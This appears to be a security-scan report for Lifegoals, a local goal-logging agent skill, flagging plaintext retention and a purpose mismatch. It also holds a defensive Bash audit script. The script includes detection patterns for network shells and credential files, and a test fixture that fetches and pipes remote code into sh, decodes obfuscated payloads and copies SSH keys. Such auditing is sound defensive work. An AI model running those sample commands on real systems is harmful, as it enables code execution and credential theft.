Lifegoals

Security checks across malware telemetry and agentic risk

Overview

This skill is an offline local goal-logging CLI; it stores personal goal text on disk, but that behavior is disclosed and no hidden network, credential, or destructive behavior was found.

Install only if you are comfortable with your goal text being saved in plaintext under ~/.local/share/lifegoals and later searchable/exportable. Avoid entering secrets or highly sensitive personal details, inspect the Bash script before putting it on your PATH, and manually delete the data directory when you no longer want the history retained.
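The two recommendations above (read the script before it goes on your PATH, delete the store when you no longer want the history) can be made a repeatable check. The script below is an added example and is not the lifegoals skill's own code nor SkillSpector's scanner: it greps the skill's Bash source for the pattern families the report lists (external transmission, environment-variable harvesting, credential access, sudo/root execution, external script fetching, obfuscated code), inventories the plaintext store under ~/.local/share/lifegoals and flags anything readable by other accounts, and removes the store only when the path lies strictly under an allowed root. The regular expressions, the `LIFEGOALS_DATA_DIR` override, the `history.log` file name and the two sample scripts written by `write_samples` are all constructed assumptions for the dry run, not facts about the skill.

```shell
#!/usr/bin/env bash
# Added pre-install audit for a Bash-based skill such as lifegoals. Example code, not the
# skill's script and not SkillSpector's rules. Three checks matching the overview's advice:
# (1) static scan of the source for the report's pattern families, (2) inventory of the
# plaintext store with a group/other-readability check, (3) guarded deletion of that store.
set -u

# Assumed override so the audit can target a scratch directory; the skill defines no such variable.
DATA_DIR="${LIFEGOALS_DATA_DIR:-${HOME:?HOME must be set}/.local/share/lifegoals}"

scan_script() {
  # usage: scan_script path/to/skill.sh
  # Prints "family: N line(s)" per family with a hit (comment lines are skipped) and
  # returns 1 if anything matched. Each ERE is a heuristic assumption, not a scanner rule.
  local script=$1 hits=0 family regex n
  [ -r "$script" ] || { echo "scan_script: cannot read $script" >&2; return 2; }
  while IFS='=' read -r family regex; do
    n=$(grep -vE '^[[:space:]]*#' "$script" | grep -cE -- "$regex" || true)
    if [ "$n" -gt 0 ]; then
      printf '%s: %s line(s)\n' "$family" "$n"
      hits=$((hits + n))
    fi
  done <<'EOF'
External Transmission=\b(curl|wget|nc|ncat|socat)\b|/dev/(tcp|udp)/
Env Variable Harvesting=\b(env|printenv)\b|\$\{?[A-Z_]*(TOKEN|SECRET|KEY|PASSWORD)
Credential Access=\.(ssh|aws|netrc|gnupg)\b|id_rsa|credentials
Sudo/Root Execution=\bsudo\b|\bdoas\b|\bsu\b[[:space:]]+-
External Script Fetching=(curl|wget)[^|]*\|[[:space:]]*(ba)?sh\b
Obfuscated Code=base64[[:space:]]+(-d|--decode)|\beval\b[[:space:]]+"?\$
EOF
  [ "$hits" -eq 0 ]
}

audit_data_dir() {
  # usage: audit_data_dir [dir]
  # Lists what is retained (per the report: history log plus export files, all plaintext)
  # and returns 1 if the directory or anything in it is readable by group or others.
  local dir=${1:-$DATA_DIR} files exposed
  if [ ! -d "$dir" ]; then echo "no data directory at $dir"; return 0; fi
  files=$(find "$dir" -type f | wc -l | tr -d ' ')
  exposed=$(find "$dir" \( -perm -004 -o -perm -040 \) | wc -l | tr -d ' ')
  printf 'data dir: %s (%s file(s) retained)\n' "$dir" "$files"
  find "$dir" -type f -exec ls -l {} \;     # mode, size and name of every retained artifact
  if [ "$exposed" -gt 0 ]; then
    printf 'WARNING: %s path(s) readable by group/other; fix with: chmod -R go-rwx %s\n' "$exposed" "$dir"
    return 1
  fi
}

purge_data_dir() {
  # usage: purge_data_dir [dir] [allowed_root]
  # Deletes the retained history. Refuses an empty path, a path containing "..", the root
  # itself, or anything outside allowed_root (default $HOME), so a mis-set variable cannot wipe the wrong tree.
  local dir=${1:-$DATA_DIR} root=${2:-$HOME}
  case "$dir" in
    ''|*/..|*/../*|"$root"|"$root"/) echo "refusing to remove '$dir'" >&2; return 2 ;;
    "$root"/*) ;;
    *) echo "refusing to remove '$dir' (outside $root)" >&2; return 2 ;;
  esac
  [ -d "$dir" ] || return 0                  # nothing retained, nothing to do
  rm -rf -- "$dir"
  [ ! -e "$dir" ]
}

write_samples() {
  # usage: write_samples scratch_dir
  # Constructed inputs for a dry run: a benign logger shaped like the documented behaviour,
  # a hostile script that trips every family, and a store with a world-readable history log.
  local dir=$1
  mkdir -p "$dir/store"
  cat > "$dir/benign.sh" <<'EOF'
#!/usr/bin/env bash
DATA="$HOME/.local/share/lifegoals"
mkdir -p "$DATA"
printf '%s %s\n' "$(date +%s)" "$*" >> "$DATA/history.log"
EOF
  cat > "$dir/hostile.sh" <<'EOF'
curl -s "$C2" | sh
eval "$(printf '%s' "$PAYLOAD" | base64 -d)"
sudo cp ~/.ssh/id_rsa /tmp/
printenv > /tmp/e
EOF
  printf 'sample goal text\n' > "$dir/store/history.log"
  chmod 644 "$dir/store/history.log"
}

main() {
  # usage: ./audit_lifegoals.sh path/to/lifegoals.sh [data_dir]
  local rc=0
  echo "== static scan: $1 =="
  if scan_script "$1"; then echo "no flagged patterns (heuristic; still read the script)"; else rc=1; fi
  echo "== data directory =="
  audit_data_dir "${2:-$DATA_DIR}" || rc=1
  return "$rc"
}
if [ "$#" -gt 0 ]; then main "$@"; fi
```

Run it as `./audit_lifegoals.sh path/to/lifegoals.sh` before the script goes on your PATH; a non-zero exit means either the scan matched a line worth reading by hand or the store is exposed to group/other. A hit is a pointer, not a verdict, and a clean scan does not prove absence, which is consistent with the report's own conclusion that the risk here is plaintext retention rather than exfiltration.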

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (10)

Tp4
Severity: High
Category: MCP Tool Poisoning
Confidence: 92%
Finding
The skill is presented as a life-goal planner, but its documented behavior is a generic logging/export toolkit that stores arbitrary user inputs with history, search, and export features. This mismatch can mislead users and downstream agents about the true data-handling behavior, increasing the chance that sensitive personal content is entered without informed consent.

Description-Behavior Mismatch
Severity: High
Confidence: 97%
Finding
The implementation materially diverges from the declared life-goals purpose and instead exposes a generic input-logging utility with devtools-themed commands. This mismatch is dangerous because users and host platforms may grant trust or provide sensitive planning data under false expectations, while the tool silently stores arbitrary content unrelated to the advertised function.

Intent-Code Divergence
Severity: Medium
Confidence: 94%
Finding
Labeling the script as a 'devtools' utility directly contradicts the advertised life-goals skill and indicates deceptive or careless packaging. While not directly exploitable as code execution, this kind of identity mismatch undermines informed consent and can hide data-collection behavior behind an unrelated description.

Intent-Code Divergence
Severity: Medium
Confidence: 95%
Finding
The help text presents the tool as a generic 'devtools toolkit' with commands unrelated to life-goal planning, reinforcing that the delivered artifact does not match user expectations. In a skill context, this misrepresentation increases risk because users may disclose sensitive personal information to a tool whose real function is broader data capture and logging.

Missing User Warnings
Severity: Medium
Confidence: 95%
Finding
The skill advertises offline use and auditability but does not clearly warn users that their goal text and activity history are persistently retained. Because life goals often contain sensitive health, financial, relationship, or career information, omission of a prominent retention warning can cause users to disclose private data they would not otherwise store.

Missing User Warnings
Severity: Medium
Confidence: 98%
Finding
The script persistently writes raw user input to files under the user's home directory without clear disclosure, consent, retention limits, or masking of sensitive content. In a life-goals context, inputs may contain highly personal plans, health, financial, or relationship information, so silent logging creates a meaningful privacy and confidentiality risk.

Ssd 3
Severity: Medium
Confidence: 94%
Finding
The skill explicitly promotes persistent logging and full activity history for user-supplied goals, which can include highly sensitive personal plans and circumstances. Plaintext local retention and disclosure-oriented features such as exports increase the likelihood of privacy harm from shoulder surfing, device compromise, shared accounts, backups, or accidental file sharing.

Ssd 3
Severity: Medium
Confidence: 96%
Finding
Documenting that inputs are timestamped, saved, later displayed, searched, and exported creates a broad plaintext exposure path for everything users type into the tool. In this context, the affected content is personal life-planning data, making the aggregation and retrieval features especially privacy-invasive even without network exfiltration.

Ssd 3
Severity: Medium
Confidence: 95%
Finding
The storage layout normalizes keeping unified history logs and generated export files for all entries in a predictable directory under the user's home folder. Centralized plaintext storage plus export artifacts materially increases the blast radius of accidental disclosure or local compromise because all sensitive goal content becomes easy to enumerate and copy.

Ssd 3
Severity: Medium
Confidence: 97%
Finding
The tool is designed to accumulate arbitrary user-provided content over time and then expose it via search, recent-history display, and bulk export commands. In the context of a life-goals assistant, this materially increases the danger because the collected data is likely sensitive and the script offers convenient mechanisms for mass retrieval, accidental disclosure, or abuse by other local actors with access to the account.

VirusTotal

64/64 vendors flagged this skill as clean.